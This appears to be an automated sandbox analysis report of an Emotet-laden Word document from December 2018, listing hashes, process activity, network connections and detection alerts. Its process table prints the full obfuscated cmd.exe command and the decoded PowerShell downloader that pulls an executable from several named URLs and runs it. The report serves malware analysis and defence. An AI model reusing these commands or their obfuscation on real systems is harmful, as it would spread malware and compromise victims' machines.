File name: | PAY_681407YKZQLCH_12_18_18.doc |
Full analysis: | https://app.any.run/tasks/9d6ca405-2146-45c8-b9cd-d5285c6a2e65 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 09:45:07 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 21:25:00 2018, Last Saved Time/Date: Mon Dec 17 21:25:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 34, Security: 0 |
MD5: | 9C3C3B387EE4C6E799E78F0F469D91DA |
SHA1: | 8AD1284839D45414EF258AA1005B53886D2A942F |
SHA256: | 9BC017958890FD2E59A44C33E3A3D39775E6657B5A329D57F5E5399023846A64 |
SSDEEP: | 1536:lI681ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvad2lYPkkVpwRJr0XbF3+Dh8b8:lI68GhDS0o9zTGOZD6EbzCdMiwT1h8b |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:17 21:25:00 |
ModifyDate: | 2018:12:17 21:25:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 34 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 38 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PAY_681407YKZQLCH_12_18_18.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
988 | c:\HDjzASw\dXUoDSp\rQWBhXVQZ\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set 5k0=DjEYwUizYplXvvcpzfiFOfohJ\:e'ASG,K{1L}TQnm8tykgx/WNB+ ZaI6P2@5;M$d.C4()0s9r=7b-u&&for %f in (64;30;1;31;75;28;50;55;10;28;62;64;20;45;21;75;40;27;4;78;22;77;1;27;14;43;53;50;27;43;66;49;27;77;67;10;18;27;40;43;62;64;1;31;15;75;28;23;43;43;15;26;48;48;4;4;4;66;21;79;40;43;27;10;22;66;14;22;41;48;61;42;30;35;47;24;71;73;60;23;43;43;15;26;48;48;4;4;4;66;72;23;22;79;43;68;41;79;72;18;14;66;14;22;41;48;33;45;43;68;67;5;58;13;11;59;60;23;43;43;15;26;48;48;55;65;13;79;72;43;27;14;23;66;14;22;41;48;10;61;2;14;55;41;38;0;44;60;23;43;43;15;26;48;48;4;4;4;66;14;27;27;27;43;4;23;66;22;74;46;48;5;54;4;23;76;2;56;49;0;57;60;23;43;43;15;26;48;48;4;4;4;66;46;41;10;72;22;21;43;4;55;74;27;66;14;22;41;48;18;43;38;54;56;40;27;61;63;28;66;30;15;10;18;43;69;28;60;28;70;62;64;19;4;79;75;28;8;8;18;28;62;64;58;72;36;53;75;53;28;73;76;61;28;62;64;38;39;72;75;28;51;18;30;28;62;64;29;38;19;75;64;27;40;13;26;43;27;41;15;52;28;25;28;52;64;58;72;36;52;28;66;27;47;27;28;62;21;22;74;27;55;14;23;69;64;13;56;14;53;18;40;53;64;1;31;15;70;34;43;74;44;34;64;20;45;21;66;0;22;4;40;10;22;55;65;19;18;10;27;69;64;13;56;14;32;53;64;29;38;19;70;62;64;11;4;11;75;28;41;41;20;28;62;56;21;53;69;69;31;27;43;78;56;43;27;41;53;64;29;38;19;70;66;10;27;40;46;43;23;53;78;46;27;53;42;71;71;71;71;70;53;34;56;40;13;22;45;27;78;56;43;27;41;53;64;29;38;19;62;64;1;36;18;75;28;29;49;56;28;62;77;74;27;55;45;62;37;37;14;55;43;14;23;34;37;37;64;16;4;16;75;28;19;55;14;28;62;86)do set ZH=!ZH!!5k0:~%f,1!&&if %f==86 powershell "!ZH:~-458!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2668 | CmD /V/C"set 5k0=DjEYwUizYplXvvcpzfiFOfohJ\:e'ASG,K{1L}TQnm8tykgx/WNB+ ZaI6P2@5;M$d.C4()0s9r=7b-u&&for %f in (64;30;1;31;75;28;50;55;10;28;62;64;20;45;21;75;40;27;4;78;22;77;1;27;14;43;53;50;27;43;66;49;27;77;67;10;18;27;40;43;62;64;1;31;15;75;28;23;43;43;15;26;48;48;4;4;4;66;21;79;40;43;27;10;22;66;14;22;41;48;61;42;30;35;47;24;71;73;60;23;43;43;15;26;48;48;4;4;4;66;72;23;22;79;43;68;41;79;72;18;14;66;14;22;41;48;33;45;43;68;67;5;58;13;11;59;60;23;43;43;15;26;48;48;55;65;13;79;72;43;27;14;23;66;14;22;41;48;10;61;2;14;55;41;38;0;44;60;23;43;43;15;26;48;48;4;4;4;66;14;27;27;27;43;4;23;66;22;74;46;48;5;54;4;23;76;2;56;49;0;57;60;23;43;43;15;26;48;48;4;4;4;66;46;41;10;72;22;21;43;4;55;74;27;66;14;22;41;48;18;43;38;54;56;40;27;61;63;28;66;30;15;10;18;43;69;28;60;28;70;62;64;19;4;79;75;28;8;8;18;28;62;64;58;72;36;53;75;53;28;73;76;61;28;62;64;38;39;72;75;28;51;18;30;28;62;64;29;38;19;75;64;27;40;13;26;43;27;41;15;52;28;25;28;52;64;58;72;36;52;28;66;27;47;27;28;62;21;22;74;27;55;14;23;69;64;13;56;14;53;18;40;53;64;1;31;15;70;34;43;74;44;34;64;20;45;21;66;0;22;4;40;10;22;55;65;19;18;10;27;69;64;13;56;14;32;53;64;29;38;19;70;62;64;11;4;11;75;28;41;41;20;28;62;56;21;53;69;69;31;27;43;78;56;43;27;41;53;64;29;38;19;70;66;10;27;40;46;43;23;53;78;46;27;53;42;71;71;71;71;70;53;34;56;40;13;22;45;27;78;56;43;27;41;53;64;29;38;19;62;64;1;36;18;75;28;29;49;56;28;62;77;74;27;55;45;62;37;37;14;55;43;14;23;34;37;37;64;16;4;16;75;28;19;55;14;28;62;86)do set ZH=!ZH!!5k0:~%f,1!&&if %f==86 powershell "!ZH:~-458!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2584 | powershell "$SjG='Nal';$Okf=new-object Net.WebClient;$jGp='http://www.funtelo.com/58S1xJ09@http://www.shout4music.com/Kkt4CUPvX2@http://advustech.com/l5EcamTDy@http://www.ceeetwh.org/UZwh7EIWD6@http://www.gmlsoftware.com/itTZIne5M'.Split('@');$Fwu='YYi';$PsL = '975';$TQs='BiS';$ATF=$env:temp+'\'+$PsL+'.exe';foreach($vIc in $jGp){try{$Okf.DownloadFile($vIc, $ATF);$XwX='mmO';If ((Get-Item $ATF).length -ge 80000) {Invoke-Item $ATF;$jLi='AWI';break;}}catch{}}$zwz='Fac';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3860 | "C:\Users\admin\AppData\Local\Temp\975.exe" | C:\Users\admin\AppData\Local\Temp\975.exe | — | powershell.exe |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
1952 | "C:\Users\admin\AppData\Local\Temp\975.exe" | C:\Users\admin\AppData\Local\Temp\975.exe | 975.exe | |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
2296 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 975.exe |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
2904 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Version: 8.00.0.010 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA711.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83B0ABEA.wmf | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB2FB88.wmf | — | |
MD5:— | SHA256:— | |||
2584 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZD3939DDBVHNZ5WA5BH.temp | — | |
MD5:— | SHA256:— | |||
2584 | powershell.exe | C:\Users\admin\AppData\Local\Temp\975.exe | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:FA3A2822E5358AFCFF85AE1677D1E2C3 | SHA256:DDF3910DB70833227500C79879E69360B25F3750CEC316F371FE4D4C0ADDE977 | |||
2584 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE51F6E3.wmf | wmf | |
MD5:A0C6EB345347B879C7C5F22D71D420B6 | SHA256:F3F892D236EE755B728BB29C4ACED0354CFB96C5A7B109A71F3457B6F9F67F4D | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:238FEFC97CBAD871EBAE1851031DD152 | SHA256:EF23EFC9C46D817C34BF5F9AA09D1C331D3EE455D9922478E1C1398F1E4036B0 | |||
1952 | 975.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:F4868C78F5B1394F9F5B99DDF118E4E1 | SHA256:890B9B288AA2C2183DA044232C2B750B83565741464E1938FD53444EB0929F18 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2584 | powershell.exe | GET | 302 | 192.185.2.61:80 | http://www.funtelo.com/58S1xJ09 | US | html | 297 b | malicious |
2904 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious |
2904 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious |
2584 | powershell.exe | GET | 200 | 74.208.53.56:80 | http://advustech.com/l5EcamTDy/ | US | executable | 124 Kb | malicious |
2904 | archivesymbol.exe | GET | — | 181.197.253.133:8080 | http://181.197.253.133:8080/ | AR | — | — | suspicious |
2904 | archivesymbol.exe | GET | — | 201.190.150.60:443 | http://201.190.150.60:443/ | AR | — | — | malicious |
2904 | archivesymbol.exe | GET | 200 | 70.55.69.202:7080 | http://70.55.69.202:7080/ | CA | binary | 132 b | suspicious |
2584 | powershell.exe | GET | 403 | 109.203.99.114:80 | http://www.shout4music.com/Kkt4CUPvX2 | GB | html | 400 b | malicious |
2584 | powershell.exe | GET | 301 | 74.208.53.56:80 | http://advustech.com/l5EcamTDy | US | html | 239 b | malicious |
2584 | powershell.exe | GET | 200 | 192.185.2.61:80 | http://www.funtelo.com/cgi-sys/suspendedpage.cgi | US | html | 7.12 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2904 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
2584 | powershell.exe | 109.203.99.114:80 | www.shout4music.com | Simply Transit Ltd | GB | malicious |
2584 | powershell.exe | 192.185.2.61:80 | www.funtelo.com | CyrusOne LLC | US | malicious |
2584 | powershell.exe | 74.208.53.56:80 | advustech.com | 1&1 Internet SE | US | malicious |
2904 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
2904 | archivesymbol.exe | 201.190.150.60:443 | — | ARLINK S.A. | AR | malicious |
2904 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
2904 | archivesymbol.exe | 81.150.17.158:8443 | — | British Telecommunications PLC | GB | malicious |
2904 | archivesymbol.exe | 181.197.253.133:8080 | — | BVNET S.A. | AR | suspicious |
2904 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
Domain | IP | Reputation |
---|---|---|
www.funtelo.com |
| malicious |
www.shout4music.com |
| malicious |
advustech.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2584 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2584 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2584 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2584 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |